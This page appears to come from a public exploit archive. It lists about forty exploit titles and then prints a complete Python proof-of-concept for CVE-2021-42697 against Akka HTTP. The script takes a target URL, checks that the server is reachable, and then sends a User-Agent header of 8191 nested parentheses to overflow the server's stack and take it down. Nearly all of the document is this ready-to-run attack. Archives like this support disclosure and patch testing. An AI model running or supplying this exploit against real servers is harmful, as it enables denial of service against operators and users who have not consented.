
42 changes to exploits/shellcodes UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path Wondershare Dr.Fone 11.4.10 - Insecure File Permissions ExifTool 12.23 - Arbitrary Code Execution Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService) Prime95 Version 30.7 build 9 - Remote Code Execution (RCE) Akka HTTP 10.1.14 - Denial of Service USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor Bookeen Notea - Directory Traversal SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure DLINK DIR850 - Insecure Access Control DLINK DIR850 - Open Redirect Apache CouchDB 3.2.1 - Remote Code Execution (RCE) Tenda HG6 v3.3.0 - Remote Command Injection Google Chrome 78.0.3904.70 - Remote Code Execution PyScript - Read Remote Python Source Code DLINK DAP-1620 A1 v1.01 - Directory Traversal Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) ImpressCMS v1.4.4 - Unrestricted File Upload Microfinance Management System 1.0 - 'customer_number' SQLi WebTareas 2.4 - Blind SQLi (Authenticated) WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated) Magento eCommerce CE v2.3.5-p2 - Blind SQLi Bitrix24 - Remote Code Execution (RCE) (Authenticated) CSZ CMS 1.3.0 - 'Multiple' Blind SQLi Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS) Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS) e107 CMS v3.2.1 - Multiple Vulnerabilities Anuko Time Tracker - SQLi (Authenticated) TLR-2005KSH - Arbitrary File Upload Explore CMS 1.0 - SQL Injection Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS) Beehive Forum - Account Takeover MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Joomla Plugin SexyPolling 2.1.7 - SQLi WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
57 lines
No EOL
2.4 KiB
Python
Executable file
57 lines
No EOL
2.4 KiB
Python
Executable file
# Exploit Title: Akka HTTP Denial of Service via Nested Header Comments
|
|
# Date: 18/4/2022
|
|
# Exploit Author: cxosmo
|
|
# Vendor Homepage: https://akka.io
|
|
# Software Link: https://github.com/akka/akka-http
|
|
# Version: Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7
|
|
# Tested on: Akka HTTP 10.2.4, Ubuntu
|
|
# CVE : CVE-2021-42697
|
|
|
|
import argparse
|
|
import logging
|
|
import requests
|
|
|
|
# Logging config
|
|
logging.basicConfig(level=logging.INFO, format="")
|
|
log = logging.getLogger()
|
|
|
|
def send_benign_request(url, verify=True):
|
|
log.info(f"Sending benign request to {url} for checking reachability...")
|
|
try:
|
|
r = requests.get(url)
|
|
log.info(f"Benign request returned following status code: {r.status_code}")
|
|
return True
|
|
except Exception as e:
|
|
log.info(f"The following exception was encountered: {e}")
|
|
return False
|
|
|
|
def send_malicious_request(url, verify=True):
|
|
log.info(f"Sending malicious request to {url}")
|
|
# Akka has default HTTP header limit of 8192; 8191 sufficient to trigger stack overflow per 10.2.4 testing
|
|
nested_comment_payload = "("*8191
|
|
headers = {'User-Agent': nested_comment_payload}
|
|
try:
|
|
r = requests.get(url, headers=headers)
|
|
log.info(f"Request returned following status code: {r.status_code}")
|
|
# Expected exception to be returned if server is DoSed successfully
|
|
except requests.exceptions.RequestException as e:
|
|
if "Remote end closed connection without response" in str(e):
|
|
log.info(f"The server is unresponsive per {e}: DoS likely successful")
|
|
except Exception as e:
|
|
log.info(f"The following exception was encountered: {e}")
|
|
|
|
if __name__ == "__main__":
|
|
# Parse command line
|
|
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
|
|
required_arguments = parser.add_argument_group('required arguments')
|
|
required_arguments.add_argument("-t", "--target",
|
|
help="Target URL for vulnerable Akka server (e.g. https://localhost)",
|
|
required="True", action="store")
|
|
parser.add_argument("-k", "--insecure",
|
|
help="Disable verification of SSL/TLS certificate",
|
|
action="store_false", default=True)
|
|
args = parser.parse_args()
|
|
|
|
# Send requests: first is connectivity check, second is DoS attempt
|
|
if send_benign_request(args.target, args.insecure):
|
|
send_malicious_request(args.target, args.insecure) |